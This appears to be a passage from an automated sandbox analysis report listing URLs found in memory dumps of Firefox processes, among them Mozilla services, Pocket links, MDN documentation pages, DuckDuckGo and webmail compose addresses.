Source: firefox.exe, 00000015.00000002.2880770582.00000259339AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.000002593582E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2867917308.000002ADC16E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7AEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 00000015.00000002.2952417248.0000025942489000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000015.00000002.2940088335.00000259403A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000015.00000002.2879062103.0000025928330000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2879062103.0000025928311000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3049658732.000001EF1DF11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 00000015.00000002.2939307905.000002594022D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2789894282.000002594023C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3124908460.000001EF35B83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000015.00000002.2919125459.000002593A62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915569464.000002593A103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E98B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 00000015.00000002.2919125459.000002593A603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
Source: firefox.exe, 00000015.00000002.2908644373.0000025939040000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 00000015.00000002.2915569464.000002593A103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2919125459.000002593A603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E98B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000015.00000002.2908644373.0000025939040000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 00000015.00000002.2908644373.0000025939040000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 00000015.00000002.2919125459.000002593A62C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureWebExtensionUncheckedLastErr
Source: firefox.exe, 00000015.00000002.2919125459.000002593A62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915569464.000002593A103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E98B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 00000015.00000002.2919125459.000002593A603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarningElem
Source: firefox.exe, 00000015.00000002.2908644373.0000025939040000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 00000015.00000002.2919125459.000002593A62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915569464.000002593A103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E98B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 00000015.00000002.2919125459.000002593A603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
Source: firefox.exe, 00000015.00000002.2908644373.0000025939040000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000003.3012505197.000001EF2ECBE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3087233459.000001EF2ECBE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000003.3018436413.000001EF2ECBE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsbro
Source: firefox.exe, 00000015.00000002.2919125459.000002593A62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915569464.000002593A103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E98B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 00000015.00000002.2919125459.000002593A603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 00000015.00000002.2908644373.0000025939040000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 00000015.00000003.2831553568.00000259412F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: firefox.exe, 00000015.00000002.2939307905.000002594022D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3124908460.000001EF35B83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000015.00000002.2939307905.000002594022D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3124908460.000001EF35B83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000015.00000002.2939307905.000002594022D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2789894282.000002594023C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3124908460.000001EF35B83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 00000015.00000002.2964091165.0000370D2CF04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3121604934.000001EF35723000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000015.00000003.2815648543.00000259406B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2757162605.0000025937E60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2961374287.00000562C2004000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2906919520.0000025938ED9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2879062103.00000259283D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2962605090.00001A7B3D004000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3083600503.000001EF2E68C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E9DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3086366052.000001EF2EB9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 00000015.00000002.2963140351.00001F079B900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?Z
Source: firefox.exe, 00000015.00000002.2909716254.000002593924C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: firefox.exe, 00000015.00000003.2808209221.000002593A467000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000015.00000002.2889978017.00000259358BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2882491080.0000025933F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2896388912.0000025938065000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075845573.000001EF2D713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3076567128.000001EF2D803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075456153.000001EF2D6AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000015.00000002.2889978017.00000259358BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075845573.000001EF2D713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 00000015.00000002.2889978017.00000259358BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075845573.000001EF2D713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 00000015.00000002.2964091165.0000370D2CF04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ebay.comP
Source: firefox.exe, 00000015.00000002.2889978017.00000259358BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2896388912.0000025938065000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075845573.000001EF2D713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3076567128.000001EF2D803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000015.00000002.2919125459.000002593A62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915569464.000002593A103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E98B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 00000015.00000002.2919125459.000002593A62C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/SelectOptionsLengthAssignmentW
Source: firefox.exe, 00000015.00000002.2908644373.0000025939040000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 00000015.00000002.2936356785.000002593FDE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2938420212.0000025940103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2805259789.000002593FDE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7A12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C839000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000015.00000002.2884763162.0000025934427000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2808950277.00000259407D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2811265427.00000259407C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000015.00000002.2915022634.000002593A02A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2904711739.0000025938670000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 00000015.00000002.2884763162.0000025934427000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3071091391.000001EF2CE92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1resource://gre/modules/AddonManager.jsm
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1resource://gre/modules/AddonManager.jsmParent
Source: firefox.exe, 00000015.00000002.2889978017.00000259358D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2879062103.0000025928391000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3051133453.000001EF29652000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075845573.000001EF2D742000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3064689751.000001EF2C526000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 00000015.00000002.2936356785.000002593FDE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2938420212.0000025940103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2805259789.000002593FDE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7A12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C839000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7AC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3049658732.000001EF1DF6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3086366052.000001EF2EB9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C839000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7AC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3049658732.000001EF1DF6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3086366052.000001EF2EB9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C839000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000015.00000002.2884763162.0000025934427000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2924708904.000002593ACD1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934447000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7A2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C839000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7AC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3049658732.000001EF1DF6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
